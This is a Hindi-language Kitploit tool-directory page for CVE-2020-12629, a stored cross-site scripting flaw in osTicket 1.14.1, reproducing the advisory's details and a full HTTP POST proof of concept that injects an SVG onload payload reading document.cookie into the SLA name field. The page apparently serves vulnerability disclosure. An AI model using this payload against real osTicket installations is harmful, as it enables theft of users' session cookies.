Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-12629 — osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting | Kitploit
उपकरण/GitHubGitHub/mkelepce/cve-2020-12629
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmkelepce/cve-2020-12629

CVE-2020-12629

osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting

रिपॉजिटरी देखें
46 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

osTicket 1.14.1 - लगातार प्रमाणीकृत क्रॉस-साइट स्क्रिप्टिंग
लेखक: Mehmet Kelepce / Gais Cyber Security
दिनांक : 2020-03-24
स्रोत लिंक: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12629
एक्सप्लॉइट-डीबी : https://www.exploit-db.com/exploits/48413
विक्रेता: http://osticket.com
दूरस्थ रूप से शोषणीय: हाँ
गतिशील कोडिंग भाषा: PHP
CVSSv3 आधार स्कोर: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

यह भेद्यता स्रोत कोड की जांच करके पाई गई थी।

PoC : टिकट SLA योजना का नाम - HTTP POST अनुरोध
-----
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&CSRFToken=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

असुरक्षित पैरामीटर: name
पैरामीटर फ़ाइल: /scp/slass.php

मैंने किसी भी टिकट के लिए SLA का नाम उपयोग किया।

जोखिम : लक्ष्य उपयोगकर्ता की कुकी जानकारी प्राप्त की जाती है।

टूल डाउनलोड करें